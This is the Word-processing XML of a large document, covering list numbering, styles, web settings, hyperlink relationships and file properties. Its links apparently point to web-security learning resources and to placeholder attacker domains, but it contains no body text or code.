  <w:num w:numId="128">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="129">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="130">
    <w:abstractNumId w:val="138"/>
  </w:num>
  <w:num w:numId="131">
    <w:abstractNumId w:val="82"/>
  </w:num>
  <w:num w:numId="132">
    <w:abstractNumId w:val="105"/>
  </w:num>
  <w:num w:numId="133">
    <w:abstractNumId w:val="177"/>
  </w:num>
  <w:num w:numId="134">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="135">
    <w:abstractNumId w:val="97"/>
  </w:num>
  <w:num w:numId="136">
    <w:abstractNumId w:val="122"/>
  </w:num>
  <w:num w:numId="137">
    <w:abstractNumId w:val="150"/>
  </w:num>
  <w:num w:numId="138">
    <w:abstractNumId w:val="78"/>
  </w:num>
  <w:num w:numId="139">
    <w:abstractNumId w:val="170"/>
  </w:num>
  <w:num w:numId="140">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="141">
    <w:abstractNumId w:val="151"/>
  </w:num>
  <w:num w:numId="142">
    <w:abstractNumId w:val="99"/>
  </w:num>
  <w:num w:numId="143">
    <w:abstractNumId w:val="91"/>
  </w:num>
  <w:num w:numId="144">
    <w:abstractNumId w:val="157"/>
  </w:num>
  <w:num w:numId="145">
    <w:abstractNumId w:val="90"/>
  </w:num>
  <w:num w:numId="146">
    <w:abstractNumId w:val="117"/>
  </w:num>
  <w:num w:numId="147">
    <w:abstractNumId w:val="114"/>
  </w:num>
  <w:num w:numId="148">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="149">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="150">
    <w:abstractNumId w:val="155"/>
  </w:num>
  <w:num w:numId="151">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="152">
    <w:abstractNumId w:val="123"/>
  </w:num>
  <w:num w:numId="153">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="154">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="155">
    <w:abstractNumId w:val="175"/>
  </w:num>
  <w:num w:numId="156">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="157">
    <w:abstractNumId w:val="80"/>
  </w:num>
  <w:num w:numId="158">
    <w:abstractNumId w:val="133"/>
  </w:num>
  <w:num w:numId="159">
    <w:abstractNumId w:val="162"/>
  </w:num>
  <w:num w:numId="160">
    <w:abstractNumId w:val="178"/>
  </w:num>
  <w:num w:numId="161">
    <w:abstractNumId w:val="126"/>
  </w:num>
  <w:num w:numId="162">
    <w:abstractNumId w:val="127"/>
  </w:num>
  <w:num w:numId="163">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="164">
    <w:abstractNumId w:val="88"/>
  </w:num>
  <w:num w:numId="165">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="166">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="167">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="168">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="169">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="170">
    <w:abstractNumId w:val="135"/>
  </w:num>
  <w:num w:numId="171">
    <w:abstractNumId w:val="146"/>
  </w:num>
  <w:num w:numId="172">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="173">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="174">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="175">
    <w:abstractNumId w:val="169"/>
  </w:num>
  <w:num w:numId="176">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="177">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="178">
    <w:abstractNumId w:val="87"/>
  </w:num>
  <w:num w:numId="179">
    <w:abstractNumId w:val="156"/>
  </w:num>
  <w:num w:numId="180">
    <w:abstractNumId w:val="130"/>
  </w:num>
  <w:num w:numId="181">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="182">
    <w:abstractNumId w:val="173"/>
  </w:num>
  <w:num w:numId="183">
    <w:abstractNumId w:val="143"/>
  </w:num>
  <w:numIdMacAtCleanup w:val="1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36FF"/>
    <w:rsid w:val="000536FF"/>
    <w:rsid w:val="000D661A"/>
    <w:rsid w:val="002A3998"/>
    <w:rsid w:val="00421A2B"/>
    <w:rsid w:val="00901C40"/>
    <w:rsid w:val="00B35A1F"/>
    <w:rsid w:val="00C93359"/>
    <w:rsid w:val="00D66BA1"/>
    <w:rsid w:val="00E1606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169F6"/>
  <w15:docId w15:val="{D39619C4-A030-4D07-A7B3-9D54F4608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link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="1F4D78"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:link w:val="Heading4Char"/>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6BA1"/>
    <w:rPr>
      <w:color w:val="2E74B5"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D66BA1"/>
    <w:rPr>
      <w:color w:val="2E74B5"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D66BA1"/>
    <w:rPr>
      <w:color w:val="1F4D78"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D66BA1"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2E74B5"/>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msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00D66BA1"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D66BA1"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00D66BA1"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00D66BA1"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D66BA1"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D66B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heme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="HTMLPreformatted"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D66BA1"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="PlainTable2">
    <w:name w:val="Plain Table 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="42"/>
    <w:rsid w:val="00D66BA1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>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D66BA1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs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D66BA1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>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D66BA1"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D66BA1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D66BA1"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D66BA1"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D66BA1"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="400"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-21">
    <w:name w:val="citation-21"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C93359"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-20">
    <w:name w:val="citation-20"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C933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9561264">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="725647318">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1195464216">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="16700139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maliciousattacker.com" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=qzvfKXynk-I" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=qzvfKXynk-I"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hyperlink" Target="https://malicious-attacker.com" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=U_tsCjOrcK4" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=U_tsCjOrcK4" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=y0bO0Y0Xqns"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www.youtube.com/watch?v=Jzr0Jdnq_EI" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/documents/000102345" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=y0bO0Y0Xq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870507-E2AD-4925-B432-8C2CC3DDEE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113</Pages>
  <Words>33864</Words>
  <Characters>193030</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1608</Lines>
  <Paragraphs>452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fefokuke polkaroad</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-04T03:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-04T15:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>